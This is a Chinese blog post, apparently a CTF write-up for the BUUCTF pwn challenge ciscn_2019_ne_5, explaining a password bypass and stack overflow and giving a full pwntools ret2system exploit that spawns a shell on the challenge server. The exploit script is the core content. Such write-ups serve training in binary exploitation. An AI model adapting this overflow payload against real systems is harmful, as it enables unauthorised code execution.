BUUCTF-PWN-ciscn_2019_ne_5

70次阅读
没有评论

共计 649 个字符,预计需要花费 2 分钟才能阅读完成。

提醒:本文最后更新于 2024-08-30 10:40,文中所关联的信息可能已发生改变,请知悉!

checksec

BUUCTF-PWN-ciscn_2019_ne_5

IDA

BUUCTF-PWN-ciscn_2019_ne_5

  • 先让 s1 == administrator 越过 if 语句的检测
  • 再选 1,写入 log,由于已经存在 system 函数,所以试图找到 binsh 的地址,但是发现 binsh 不存在,后来得知 sh 也是可以用的BUUCTF-PWN-ciscn_2019_ne_5
  • 然后选 4,利用溢出得到shell

EXP

from pwn import *

context.log_level = 'debug'

p = remote('node4.buuoj.cn', 26830)
elf = ELF('./ciscn_2019_ne_5')
sh_addr = 0x080482ea
main_addr = elf.sym['main']
sys_addr = elf.sym['system']

payload = flat(b'a' * (0x48 + 0x4) + p32(sys_addr) + p32(main_addr) + p32(sh_addr))
p.sendlineafter('password:', 'administrator')
p.sendlineafter('0.Exit\n:', '1')
p.sendlineafter('info:', payload)
p.sendlineafter('0.Exit\n:', '4')

p.interactive()

结果

BUUCTF-PWN-ciscn_2019_ne_5

正文完
 0
icvuln
版权声明:本站原创文章,由 icvuln 于2022-01-18发表,共计649字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
评论(没有评论)